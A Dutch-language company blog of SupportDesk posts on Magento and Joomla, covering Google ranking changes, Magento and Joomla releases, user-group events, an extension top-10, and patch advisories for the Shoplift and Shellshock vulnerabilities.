    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Google geeft voorrang aan mobiel-vriendelijke sites

    magento-joomla-mobileVandaag is het zover: Google voert een verandering in zijn zoeksysteem door die sites benadeelt die niet geoptimaliseerd zijn voor mobiel gebruik. Of - om in Amerikaanse termen te spreken - Mobilegeddon is here. Sites die niet goed zijn te lezen op mobiele telefoons en tablets lopen het risico dat ze hun hogere positie in de zoekresultaten verliezen. Via Google Webmaster tools hebben veel webmasters al een email gehad, maar mocht je er nog niet aan toe zijn gekomen: het moment is daar om actie te ondernemen. In deze blog geven we nadere uitleg, tips en vertellen we hoe wij je van dienst kunnen zijn.

    Mobile friendliness is ranking factor geworden

    Google rolt dus een zeer ingrijpende update van hun algoritmen uit om niet-mobielvriendelijke websites aan te pakken. We kunnen stellen dat ‘mobile friendly’ in technische zin een nieuwe ranking factor is geworden. Sites die goed zijn te lezen en gebruiken op mobiele dragers kregen sinds december vorig jaar al een speciale markering naast hun link in de zoekresultaten. Dit allemaal om de zoekresultaten relevant te houden voor het brede publiek, dat steeds vaker en intensiever mobiel zoekt. Nu heeft het dus daadwerkelijk invloed op de ranking.

    Wat kun je doen?

    Wil je weten of jouw site of webshop geoptimaliseerd is voor mobiel? Dat kun je via deze link checken. Deze test werkt alleen wanneer je Googlebot toestaat om de CSS en JavaScript in je website te indexeren. Zie ook de handleiding Mobielvriendelijke websites van Google.

    Een pagina is volgens Google mobielvriendelijk als die aan de volgende voorwaarden voldoet:

    • Geen gebruik van software die niet gebruikelijk is op smartphones, zoals Flash.
    • De tekst is leesbaar zonder inzoomen.
    • De content past in z’n geheel op het scherm, zodat de bezoeker niet horizontaal hoeft te scrollen.
    • Knoppen en links staan ver genoeg uit elkaar, zodat de bezoeker gemakkelijk de juiste link kan ‘tappen’

    Lees hierover meer op http://www.supportdesk.nu/blog/154-is-je-website-mobile-friendly

    Responsive of mobiele site

    Afhankelijk van jouw zakelijke doelstellingen en de wensen en eisen die daaruit voortvloeien kun je kiezen voor een responsive aanpak of een aparte mobiele site. Een responsive website/-shop is de meest generieke oplossing en kosten-technisch aantrekkelijk, echter de laadtijden zullen niet afnemen aangezien de HTML en content hetzelfde zijn als voor de grotere schermen. Een aparte mobiele oplossing is dan een beter alternatief. Supportdesk kan jou hierover een gericht advies geven. 

    Magento High Performance Mobile

    SupportDesk heeft de afgelopen jaren diverse studies gedaan naar mobile en high performance toepassingen en speciaal voor Magento stores een mobile template ontwikkeld. Deze Magento High Performance Mobile oplossing werkt voor elke smartphone en heeft een zeer snelle laadtijd. Dit zorgt voor een positieve klantervaring en een verbetering in de ranking van zoekmachines.

    Advies

    Als je hulp nodig hebt bij het mobiel geschikt maken van je Joomla webite of Magento webshop dan zijn we je graag van dienst.

    meer info   of   

    Bel nu! 020 337 5961

    sibren-sdDit artikel is geschreven door Sibren Wilkeshuis, vervult zijn rol als Team Manager bij SupportDesk, daarnaast is hij front-ender.

    Bronnen:

    Google Webmaster Tools https://www.google.com/webmasters/tools/home?hl=nl
    Google Webmaster Central Blog http://googlewebmastercentral.blogspot.nl/2015/02/finding-more-mobile-friendly-search.html
    Emerce - http://www.emerce.nl/achtergrond/seo-alarm-jouw-website-klaar-mobilegeddon
    Webspinnerdesign: http://www.webspinnerdesign.nl/nieuws/94-google-straft-sites-die-niet-mobielvriendelijk-zijn
    Onetomarket: https://www.onetomarket.nl/blog/seo/google-rolt-geschikt-voor-mobiel-label-uit/

     

  • Meet Magento Awards 2015

    Meet Magento Awards 2015

    Op Meet Magento staat innovatie centraal, dus daar hoort ook beloning en erkenning bij! Daarom word dit jaar voor het eerst de Meet Magento Awards geïntroduceerd. In totaal zijn er zes awards die elk onder verschillende categorieën vallen:

    1. Magento Community
    2. Magento Enterprise
    3. Magento Nieuwkomer
    4. Magento Extensie
    5. Magento Innovatie
    6. Beste bijdrage aan de Magento community

    Op de tweede dag van Meet Magento, 28 mei 2015, zullen de winnaars bekend gemaakt worden die gekozen zijn door het publiek en de vakjury.

    Winnen is natuurlijk het doel, maar ook als genomineerde word je vermeld op meet-magento.nl. Je ontvangt twee gratis tickets voor het event en natuurlijk het juryrapport.

    SupportDesk doet de volgende nominaties :

    • Ray Bogman van SupportDesk voor de award "Beste bijdrage aan de Magento community".
    • de Hypernode van Byte voor de award "Magento Innovatie".

    Wil je jezelf aanmelden of heb je iemand anders in gedachte? Dit kan nog tot en met vrijdag 24 april 2015 via meet-magento.nl/awards

     

  • Urgent: Shoplift Magento patch

    securityrelease

    Afgelopen februari kwam de patch al uit. Op dat moment was er nog geen grootschalig misbruik van gemaakt, maar dat gaat nu wel gebeuren. Magento heeft gisteren expliciet een mail gestuurd naar alle gebruikers om z.s.m. de shop te patchen. Op ieder moment kan een exploit bekend gemaakt worden, waarmee het heel makkelijk wordt om misbruik te maken van dit lek in Magento.

    Indien uw Magento shop niet gepatched is, loopt u een groot risico dat de shop gehackt wordt en gevoelige gegevens op straat komen te liggen. 

    De patch is in 10 minuten geinstalleerd, met een aantal controles en het maken van backups duurt het max een half uur. Deze kosten wegen niet op tegen de gevolgen van een gehackte site. 

    Wat moet ik doen?

    Wij raden onze klanten met een Magento webshop aan de patches vandaag nog te installeren. Wij doen dat graag voor u. Mail ons via ons supportaanvraagformulier of bel ons op 020 337 59 61.

    Via de Magento download website is het mogelijk de Magento security patch SUPEE-5344 te installeren. Maak altijd eerst een backup van de database en bestanden voor de patch wordt geïmplementeerd.

  • Magento Security Update versie 1.4 - 1.9.0.2

    securityreleaseOnlangs is er een veiligheidslek in Magento ontdekt. Het lek is aanwezig in alle versies van Magento (1.4/x - 1.9/x), dus zowel Magento Community als Magento Enterprise shops hebben hiermee te maken. Via dit lek kunnen gegevens uit de Magento installatie gehaald worden of backdoors geplaatst worden dus het is belangrijk dat snel gepatched wordt!

    Wat is het risico?

    Op dit moment is er nog geen grootschalig misbruik gemaakt van dit lek.
    Doordat het lek nu publiekelijk is, is de verwachting dat hackers dit zullen gaan misbruiken.

    Wat moet ik doen?

    Wij raden onze klanten met een Magento webshop de patches te installeren. Wij doen dat graag voor u. Mail ons via ons supportaanvraagformulier of bel ons op 020 337 59 61.

    Via de Magento download website is het mogelijk de Magento security patch SUPEE-5344 te installeren. Maak altijd eerst een backup van de database en bestanden voor de patch wordt geïmplementeerd.

    meer info   of   

    Bel nu! 020 337 5961

     

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Top 10 Magento Extension 2014
    MUG Top 10 Magento Extension 2014

    Magento User Group Amsterdam

    Afgelopen dinsdag 25 November heeft de Magento User Group Amsterdam voor de 3 keer een Top 10 verkiezing gedaan van de beste Magento Extentions van dit moment.

    De samenstelling van de modules kon vooraf worden ingediend en is aangevuld door de aanwezige MUG-ers. Dankzij de vele inzendingen was de keuze enorm en hebben we bijna een gelijk spel.

    Omdat we dit jaar zoveel inzendingen hebben ontvangen zijn deze onderverdeeld in 5 categorieen om elke extenties een goede kans te geven om te winnen.
    De 5 categorieen zijn:

    MUG Magento extention top10 2014Magento Backend Extensions

    1. Lesti::FPC [Gordon Lesti]
    2. Pdf Customiser [Fooman]
    3. AOE Scheduler [Fabrizio Branca]
    4. Diglin_UIOptimization [Diglin]
    5. Genamto Setup Versioning [Genmato]
    6. DND Patch Index URL [Agencednd]
    7. Amasty Product Grid [Amasty]
    8. OnTap Visual Merchandiserisual Merchandiser (OnTap)
    9. Enhanced Admin Product Grid [Sweeth Tooth]
    10. Sisow [Sisow]
    Tip: Rapido Image Optimization [Rapido] vanaf medio januari 2015

    Magento Frontend/Theming Extensions

    1. api.postcode.nl
    2. Infortis Ultimo Theme
    3. Custom stock status [Amasty]
    4. Stripe Subscription [Radweb]
    5. Improved Sorting [Amasty]
    6. Easy FAQ [Mage World]
    7. Argento theme [Argento]
    8. Pronav [Brandammo]
    9. FIre Checkout [Template Master]
    10. Remove Customer Account Links [Interger-net]
    Tip: Legenda en Sooqr

    MUG Magento extention top10 2014Magento Marketing Extensions

    1. AW Blog [AheadWorks]
    2. Checkitout! [EcomDev]
    3. OneStepCheckout [OneStepCheckout]
    4. MageMonkey [eBizmarts]
    5. Creare SEO [Creare]
    6. Fooman Google Analytics [Fooman]
    7. Aromicon Google Universal Analytics [Aromicon]
    8. Wyomind Data Feed Manager [Wyomind]
    9. Mirasvit Feed Export [Mirasvit]
    10. MailPlus [MailPlus]
    Tip: Newsletter Guest checkout [Free Lunch Labs]

    Slechtste Extentions

    1. Alle aziatische extensions 
    2. Maatwerk uit India
    3. Alle atoic extensions
    4. Adyen Payment
    5. PostNL
    6. MT Aries
    7. Slechte Reponsive Design themes (slecht voor performance)
    8. Color Swatch & Zoom: zorgt voor een enorme vertraging, wordt opgevangen door release van Magento 1.9.1 (op 24 november vrijgegeven)
    9. Fire Checkout
    10. Onnodige Magento modules: modules die aan staan maar niet gebruikt worden, vertragen de shop. Tip: zet de modules uit.

    Dev Tools

    Gedurende de sessie ontstond er een nieuwe categorie genaamd “Dev tools”. De meest populaire dev tool is N-98. Je kunt N-98 beschouwen als het Zwitsers zakmes van Magento. Je kunt er legio dingen mee configureren, zoals database sychroniseren, gebruikers aanmaken enz. Voor deze tool is kennis van Shell wel vereist en het voor een eerste gebruik aan te raden om eerst op een testomgeving te werken met N-98.

    1. N98-magerun
    2. GIT
    3. Magmi Importer
    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento 1.9.1 nu beschikbaar

    Magento Community 1.9.1Afgelopen week werd al bekend gemaakt de komst van Magento Enterprise 1.14.1.. Vandaan tijdens Meet Magento Polen is de Magento Community Editie 1.9.1 vrijgegeven. Met de komst van Magento 1.9.1 zijn vele bugs opgelost maar ook vele nieuwe functies toegevoegd. Magento 1.9.1 is dan ook met recht een mooie aanvulling sinds Magento 1.9.0.1.

    Nieuwe functies binnen Magento 1.9.1

    • Configurable swatches
    • Google Universal Analytics
    • Standaard support voor PHP 5.5 en MySQL 5.6.
    • Transactionele Responsive emails

    Magento 1.9.1 Security verbeteringen

    • Remote Code Execution Exploit oplossing voor .csv files (standalone patch beschikbaar).
    • Betere password reset voor beheerder (huidige wachtwoord moet ingevuld worden bij reset).
    • Wachtwoorden worden niet in platte text (clear text) verstuurd tijdens registratie.
    • Een beveiligings cookie voor de "store view" is toegevoegd om een "man-in-the-middle" aanval te voorkomen.

    Algemene wijzigingen in Magento 1.9.1

    • Verbetering van de Indexen en de performance hiervan.
    • Catalog Price Rules verbeteringen.
    • Responsive template verbeteringen (versie 1.9 was nl. nog al buggy).
    • Payment afhandelingen met PayPal en Giftcards zijn verbeterd.
    • Transactionele email worden nu batch gewijst middels de Magento cron verzonden en niet meer direct.
    • Installatie van Magento Modules gebeurt nu over HTTPS en niet meer FTP.
    • Fout melding bij installatie via Magento Downloader is verbeterd.
    • Performance verbeteringen van duizenden attributen in configurabele producten.
    • Shopping cart price rules werkt nu ook voor bundled producten.
    • Links in de sitemap zijn nu geoptimaliseerd voor SEO.
    • CMS pagina's zijn HTML5 voorbereid voor gebruik nu "tags" 

    Naast deze nieuwe functies en beveiligings aanpassingen zijn er ook veel bugs opgelost.

    Een overzicht van alle bugs en meer details omtrent deze release vind je in de release notes.

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Is je website "Mobile Friendly"?

    Is je website "Mobile Friendly"?

    Met de komst van een nieuwe wijziging in het Google Algoritme wordt een mobile nu een serieuze aangelegenheid. Al hoewel mobile al langer op het lijstje stond van Google en al vele aanbevelingen gedeeld zijn zal van af heden een extra melding getoond worden in het mobile zoekresultaat van de zoekmachine. Websites die voldoen aan de eisen van Google zullen voortaan voor het zoekresultaat te term "Mobile-friendly" te zien krijgen.

    mobile-friendly

    Is mijn Magento shop "Mobile-friendly?"

    Wat is de impact voor mijn Magento shop. Indien je nog geen mobile omgeving hebt voor je Magento website is het belangrijk te weten hoeveel klanten nu jouw website bezoeken op een mobile apparaat (bron: Google Analytics). Indien blijkt dat veel bezoeker afkomstig zijn vanaf een smartphone is het belangrijk een keuze te maken uit de volgende mogelijkheden.

    • Responsive website
    • Dynamic Serving [RESS]

    Aangezien de keuze voor Responsive voor de hand ligt kan de implementatie vaak voor vele extra verrassing en extra laadtijden kosten. Lees meer over Magento Responsive of Dynamic Serving.

    Is mijn Joomla! website "Mobile-friendly?"

    Wat is de impact voor mijn Joomla! website. Indien je nog geen mobile omgeving hebt voor je Joomla! website is het belangrijk te weten hoeveel klanten nu jouw website bezoeken op een mobile apparaat (bron: Google Analytics).

    Afhankelijk van de huidige versie, Joomla! 1.5.x, 2.5.x of 3.3.x kun je kiezen voor een Responsive of standalone template. Aangezien Joomla! 1.5 en 2.5 niet meer ondersteund worden qua update zou ons advies zijn om je Joomla! website te upgraden/migreren naar Joomla! 3.3.x.

    Joomla! 3.3.x ondersteund standaard de Responsive oplossing. Wel adviseren wij ook de oplossing verder te optimaliseren voor performance toepassen aangezien dit standaard niet wordt toegepast. Lees meer over de Responsive Mythes van Joomla!.


    Test hier of je website of shop "Mobile-friendly" is.

    Indien je website of webshop niet "Mobile-friendly is zal dit aangegeven worden.

    Mobile-friendly Joomla Community

     

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Klantbezoek neemt af

    Magento SEO - voor starters

    Een recente wijzging vanuit Google zou een behoorlijke impact kunnen hebben op de vindbaarheid van je Magento Shop. De gedachte achter de wijziging is dat Google indexering zich meer gedraagt als een moderne browser. Dit houdt in dat  de googlebot ook in staat moet zijn om javascript, css en images te benaderen.

    Op Google webmaster Central Blog daarover het volgende: http://googlewebmastercentral.blogspot.co.uk/2014/10/updating-our-technical-webmaster.html

    Het gevolg van deze wijziging in google indexering kan zijn dat er een enorme daling is klantbezoek(traffic) op je shop. Doordat de googlebot niet goed de content kan ophalen, wordt de pagina overgeslagen. Dit is te controleren door in webmaster tools gebruik te maken van de mogelijkheid: Fetch as google. Bedenk goed: wat je daar ziet, zo ziet de googlebot je shop ook!  

    Ook kun je in de robots.txt zelf zoeken naar:

    Voor wijziging:

    Disallow: /js/
    Disallow: /skin/
    Disallow: /media/

    Na wijziging:

    Allow: /js/
    Allow: /css/
    Allow: /media/

    Nu is het aanpassen van je robots.txt op het oog simpel, maar hou rekening met de gevolgen van je aanpassingen. Robots.txt bestaat nu 20 jaar en al 20 jaar worden er cruciale fouten gemaakt. Op deze link zie je tips en tricks hierover: https://www.beussery.com/blog/index.php/2014/06/robots-txt-disallow-20/

    Mocht je nog vragen hebben, we helpen je graag met het verbeteren van je robots.txt en met het herstellen van je traffic. 

     

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

     

  • Groot beveiligingslek 'Shell Shock' in Bash [Linux]

    Bash beveiligingslek Shell Shock

    Gisterenavond is bekend gemaakt dat er een groot beveiligingslek is aangetroffen in Bash (genaamd Shell Shock). Het betreft alle versies van Bash onder linux:

    Wat is het risico?

    Door deze bug, genaamd Shell Shock, kunnen aanvallers een code in de Bash-shell injecteren, waardoor zij van afstand hun eigen code kunnen uitvoeren. Apparaten die op Linux en OS X (apple) draaien zijn hiervoor kwetsbaar.

    Wat is een Bash shell?

    De Bash shell [Bourne Again Shell] bied de mogelijk ingewikkelde opdrachtregels uit te voeren. Deze opdrachten kunnen worden gebruikt om programma's aan te sturen. De Bash shell bevind zich op elke Linux en OS X besturings systeem, van Webservers tot een NAS (Netwerk Attached Storage), en van Routers (modems) tot webcams. Het is dus zaak om deze alle te patchen. In veel gevallen is dit mogelijk, maar sommige oude embedded hardware zoals Router of webcam zullen mogelijk geen patches ontvangen. 

    Wat moet ik doen?

    Wij raden onze klanten aan om alle hardware die Bash hebben te upgraden.  Mail ons via ons supportaanvraagformulier of bel ons op 020 337 59 61.

    Meer informatie

    Voor meer informatie kunt u de volgende artikelen lezen:

    http://www.nu.nl/internet/3886676/os-x-en-linux-kwetsbaar-grote-bug-in-software.html
    http://www.theregister.co.uk/2014/09/24/bash_shell_vuln/

    Byte klanten

    Mocht u klant van Byte zijn dan hoeft u geen actie te ondernemen. Lees hier meer over op de website van Byte: http://www.byte.nl/nieuws/2799-lek-bash-shell-gedicht

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento User Group: Traffic Genereren

    Jaarlijkse MUG Workshop Traffic Genereren

    Ray BogmanVrijdag 5 september was het eindelijk zover: de jaarlijkse MUG workshop met BBQ! Dit jaar hadden we gekozen voor het favoriete onderwerp "Traffic genereren". Een heet hangijzer vopor elke Magento webshop eigenaar. Dus was er een stevig programma in elkaar gezet i.s.m. Byte, Online Boswachters, HKweb en Fingerspitz.

    Magento en traffic genereren

    De theorie werd behandeld in het kantoor van Klarna op de 11e verdieping met een prachtig uitzicht over Amsterdam. De onderwerpen waren Google Analytics, Google Webmastertools, A/B Testing en hoe dit alles meer traffic naar je webshop kan genereren. De opgedane kennis werd in de middag in workshops getest. De verschillende groepen gingen voortvarend aan de slag onder begeleiding van Mike van Hoenselaar van Online Boswachters, Hans Kuijpers van HKweb en Tim IJsendoorn­ van Fingerspitz. Na de workshop gaf iedere groep een presentatie van de bevindingen en verbeteringen waarna het enthousiasme nog groter werd en mede Muggers weer nieuwe kennis hadden opgedaan om thuis mee aan de slag te kunnen gaan.

    BBQ en water?

    En toen was het tijd voor de jaarlijkse BBQ. Die vond plaats op het water. In de BBQ boot! Op de boot konden de Muggers onder het genot van een lekker drankje en een overheerlijk stukje vlees en andere versnaperingen napraten en ideeen uitwisselen. Er ontstond een echte feestsfeer die eindigde met een spontaan geregelde rondleiding langs de rode lichtjes van Amsterdam! Het werd een avond om met veel plezier op terug te kijken en waar nog veel over nagepraat is....

    Foto Impressie

    workshop Magento Traffic genereren 1

    workshop Magento Traffic genereren 2

    workshop Magento Traffic genereren 3

    workshop Magento Traffic genereren 4

    bbq boot 2bbq boot 3

     

    Presentaties

    Je kunt de presentaties nog een nakijken:

    http://www.slideshare.net/Fingerspitz/ab-testing-workshop-mug-20140905-38741650

    http://www.slideshare.net/hans2103/google-webmasters-tools

    http://www.slideshare.net/onlineboswachters/21-must-haves-om-meer-resultaat-te-halen-uit-google-analytics

    Hierbij het (voorlopige) nieuwe MUG programma:

     

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

     

  • Google gaat HTTPS meetellen in ranking

    Google neemt voortaan HTTPS mee in ranking

    De meest gebruikte zoekmachine Google heeft aangekondigd dat vanaf 6 augustus het gebruik van TLS (transport layer security) mee gaat wegen in zijn algoritme. Magento shops maken al veelal standaard gebruik van HTTPS wanneer de klanten gaan bestellen. Maar Google wil graag dat alle verkeer voortaan veilig wordt.

    https-security-magento-seoGevolg voor Magento webshops

    Vooralsnog zegt Google dit niet zwaar te laten meewegen zodat website beheerders de tijd krijgen om TLS te implementeren. De tijd die men hiervoor krijgt is nog onduidelijk maar in de toekomst zal het zeker zwaarder gaan wegen. Magento websites die nu alleen nog tijdens het afrekenen https gebruiken dienen dus ook alle andere pagina's te beveiligen. 

    Google wil met deze zet het kaf van het koren scheiden zodat de kwaliteit van de aangeboden producten en diensten, in bijvoorbeeld Google Shopping, alleen afkomstig is van valide webshops. Google heeft de afgelopen maanden getest met het nieuwe algoritme en zegt prositief te zijn over de resultaten.

    Aangeraden wordt om de volgende stappen te ondernemen:

    • Analyse welk SSL certificaat je nodig hebt: single, multi-domain of een wildcard certificate
    • Gebruik 2048-bit key certificates
      Gebruik relative URLs voor verwijzingen welke onder hetzelfde security domein vallen
    • Gebruik absolute URL's voor verwijzingen naar andere domeinen
    • Voordat je over gaat naar HTTP's zul je rekening moeten houden met het doorgeven van het nieuwe adres
    • Zorg ervoor dat je HTTP's niet blokkeert voor zoekrobots door gebruik te maken van robots.txt
    • Zorg ervoor dat je pagina's geïndexeerd worden door zoekrobots.
    • Vermijd het gebruik van de noindex meta tag.

    Instellen van HTTPS voor Magento

    Omdat je eerst moet weten welk certificaat je nodig hebt is het raadzaam hierover advies in te winnen. SupportDesk kan je hierbij helpen. We maken een analyse van de benodigde werkzaamheden waarbij we meteen een inschatting maken voor de punten die aangepast dienen te worden. Neem daarvoor contact met ons op door een mailtje te sturen naar support[at]supportdesk.nu of ons formulier in te vullen.

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento Workshop 'hoe krijg ik meer verkeer naar mijn shop'

    magento-user-group-workshop-2014In de afgelopen maanden was de Magento User Group met het onderwerp “traffic genereren” het drukst bezocht en waren we aan het eind nog láng niet uitgepraat. Genoeg reden om de jaarlijkse MUG Workshop-dag hieraan te wijden. Na de zomerstop in juni en juli gaan we vliegend van start in september!

    Vrijdag 5 September as. zal deze MUG workshop georganiseerd worden incl. de befaamde BBQ boottocht over de Amsterdamse grachten. De presentaties zullen dit jaar verzorgd worden vanuit het hoofdkantoor van Klarna Nederland (Havengebouw, verdieping 11) te Amsterdam (5 min lopen van AMS CS). 

    Presentaties:

    • 12:30 - 13:00 Ontvangst
    • 13:00 - 13:40 Presentatie over Google Analytics
    • 13:40 - 14:20 Presentatie over Google Webmaster Tools
    • 14:20 - 15:00 Presentatie over A/B testing
    • 15:00 - 15:15 Pauze
    • 15:15 - 17:30 Samen voorbeeldcases behandelen
    • 17:30 - 18:00 Einde van de workshop
    • 18:00 - 20:00 Boottocht inclusief BBQ door Amsterdam

    Presentatie over Google Analytics

    We trappen de dag af met een presentatie over Google Analytics. Hier bespreken we de manieren van juiste informatie binnenhalen, en misschien nog wel belangrijker, hoe je hiermee omgaat. De hoofdvraag: Welke informatie kan je nou het beste inzetten om meer verkeer naar je webshop te leiden? En hoe doe je dit precies? Deze interessante presentatie wordt gegeven voor Mike van Hoenselaar (Online Boswachters).

    Presentatie over Google Webmaster Tools

    De praktische presentatie over Google Webmaster Tools zal voornamelijk gaan over hoe je deze tool kan inzetten om meer verkeer naar je webshop te krijgen. Hierbij komen onderwerpen voorbij als; Rich Snippets, Sitemaps en het opschonen van dode links. Deze presentatie wordt gegeven door Hans Kuijpers (HKweb).

    Presentatie over A/B testing

    Tot slot sluiten we de presentaties af met een praktische presentatie over A/B testing. Met deze manier van testen verzamel je veel interessante data, maar hoe pluk je hier nou de vruchten van? Deze presentatie wordt gegeven door Tim van IJssendoorn (Fingerspitz).

    Voorbeeldcases behandelen

    Omdat wij erin geloven dat iedereen van “zelf doen” het meeste leert, willen we de dag afsluiten met het behandelen van verschillende cases. In groepen van maximaal 10 personen zullen we de praktische kennis uit de presentaties meteen inzetten. Hiervoor gebruiken we bestaande shops met bestaande dataverzamelingen. Wil jij jouw shop laten behandelen? Stuur dan een mail naar info [@] magento-competence-center.com.

     

    Boottocht inclusief BBQ door Amsterdam

    Net zoals voorgaande jaren sluiten we de dag af met een boottocht door de grachten van Amsterdam. Hierbij staat een heerlijke barbecue met drankjes voor je klaar om nog wat na te praten over de kennis die de dag heeft gebracht.

    Voor wie?

    Deze bootcamp is bedoeld voor implementatoren van Magento webshops: beheerders, webdesigners en programmeurs. Als je een RSVP achterlaat, vertel je dan even in welke categorie jij valt?

    De kosten

    Early Bird tickets: er zijn een beperkt aantal early bird tickets verkrijgbaar. Deze tickets kosten voor de workshop plus boottocht (incl. BBQ en drankjes) in totaal 80 euro. Zorg dus dat je er snel bij bent!

    Reguliere tickets: Op het moment dat de early bird tickets zijn uitverkocht komen de reguliere kaarten in de verkoop. Deze kaarten kosten in totaal 95 euro voor de workshop plus boottocht (incl. BBQ en drankjes).

    Kaartjes kan je bestellen via
    http://mugworkshop2014.eventbrite.nl

    Vergeet je niet om een RSVP door te geven? Alleen dan is je aanmelding compleet!

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Joomla update 3.3.3 en 2.5.24
    Joomla 33

    Joomla! heeft 2 nieuwe versies gereleased namelijk 3.3.3 en 3.2.24.  Dit zijn onderhoudsversies van Joomla.

    Wat is gedaan in Joomla! 3.3.3?

    Met deze release zijn de volgende bugs opgelost:

    • Het javascript dat ervoor zorgt dat het e-mail adres niet leesbaar is voor spam scanner was een blok element en is verandert in een inline element waardoor het niet meer nodig om een speciale css te maken voor het e-mail adres.
    • Probleem voor de admin: error die men kreeg als men in een artikel de auteurs soorteerde op gebruikersgroepen
    • Probleem opgelost voor de admin: de opgeslagen gebruikersvoorkeuren voor de Tiny MC gingen verloren.

    Voor een compleet overzicht hiervan ga je naar: Joomla 3-3-3-release-notes.

    Joomla 2.5.24 upgrade

    Joomla 2.5.24 is net als Joomla 3.3.3 een ondershoudsversie.

    Wat is er gedaan in Joomla! 2.5.24?

    Met deze release zijn de volgende bugs opgelost:

    • Het javascript dat ervoor zorgt dat het e-mail adres niet leesbaar is voor spam scanner was een blok element en is verandert in een inline element waardoor het niet meer nodig om een speciale css te maken voor het e-mail adres.
    • Code error opgelost voor PHP

    De release notes zijn hier te vinden.


    Wil je meer informatie of hulp bij het installeren? Wij kunnen je helpen. Kijk bijvoorbeeld eens naar onze Joomla support.

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Google Analytics Enhanced Ecommerce

    Google Analytics nu met Enhanced Ecommerce

    Google heeft de afgelopen weken de nieuwe e-commerce tool "Google Enhanced Ecommerce" uitgerold en deze is nu beschikbaar voor jouw Magento webshop. Google heeft speciaal voor webshop eigenaren deze tool uitgebracht om tegemoet te komen aan de wens van retailers om een beter inzicht te krijgen in het koopgedrag.

    Dit is goed nieuws voor iedereen met een Magento webshop. Voortaan heb je inzicht in:

    • Verlaten winkelwagentjes
    • Wáár een klant producten in en uit de winkelwagen haalt
    • Welke producten de klanten bekeken hebben en hoe vaak ze zo een product toevoegen aan het winkelwagentje
    • Hoeveel bestellingen er afgerond worden
    • Waar in het afrekenproces de klant afhaakt

     

    Instellen van Magento voor Google Enhanced Ecommerce

    Maak je al gebruik van Google Universal dan kun je overgaan naar enhanced e-commerce door analytics.js te migreren naar zetten ecommerce.js. Wanneer je nog gebruik maakt van Google Analytics (ga.js) dan moet je eerst naar Google Universal (analytics.js) en daarna kun je pas over naar Google Enhanced Ecommerce (ecommerce.js).

    enhanced-ecommerce-settings 

    Wanneer je ecommerce.js hebt geïmplementeerd moet je in Google Analytics bij de beheerdersfunctie in de kolom Dataweergave onder het onderdeel E-commerce-instellingen nog de switch omzetten bij het tweede onderdeel “Instellingen voor geoptimaliseerde e-commerce”. Nu kun je bij dit onderdeel je analytics inrichten.

    Aanpassen van jouw Magento Webshop

    Natuurlijk kunnen we een analyse voor je uitvoeren wat de impact is voor jouw Magento webshop of Joomla website waarbij we meteen een inschatting maken voor de punten die aangepast dienen te worden. Neem daarvoor contact met ons op door een mailtje te sturen naar support[at]supportdesk.nu of ons formulier in te vullen.

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Google Panda 4.0 - nieuwe SEO regels

    panda-4-update-supermarket-fight

    Google releases Panda 4.0

    Google heeft een nieuwe release van zijn zoekalgoritme uitgebracht Panda 4.0. In deze release zijn er een aantal veranderingen gedaan waardoor de ranking weer drastisch kan veranderen zoals E-Bay heeft kunnen merken. Wat opvallend is dat het algoritme aangepast is en juist de websites en webshops die unieke hoog kwalitatieve inhoud hebben hoger scoren. Daarentegen zijn sites waarbij er geen mogelijkheden tot het delen van content juist in ranking naar beneden gegleden. Het ziet er dus naar uit dat Google beloont op sociale interactie en straft op slecht geschreven teksten. Natuurlijk is dat niet geheel nieuw. Google heeft altijd unieke content hoog in het vaandel gehad. Met Panda 4.0 bevestigen ze nogmaals hoeveel waarde ze hieraan hechten.

    Toch lijken ze ook op hun schreden terug te keren voor wat betreft de Rich Snippets. Ze hebben namelijk al een aantal onderdelen geschrapt zo is onlangs het onderdeel "Author" geschrapt. Het is dus goed om je website nog eens helemaal in Google na te kijken en te zien of er na deze release mogelijk verbeteringen aan te brengen zijn om zo je website hoger in de ranking te krijgen

    Gevolgen van Panda

    Google wil dat de volgende punten goed zijn geïmplementeerd:

    • Content moet relevant en van hoge kwaliteit zijn
    • De zoekopdracht die een gebruiker van Google doet moet unieke resultaten opleveren die jouw winkel onderscheid van andere winkels
    • Zorg ervoor dat je content makkelijk geliked, geplusd en gedeeld kan worden
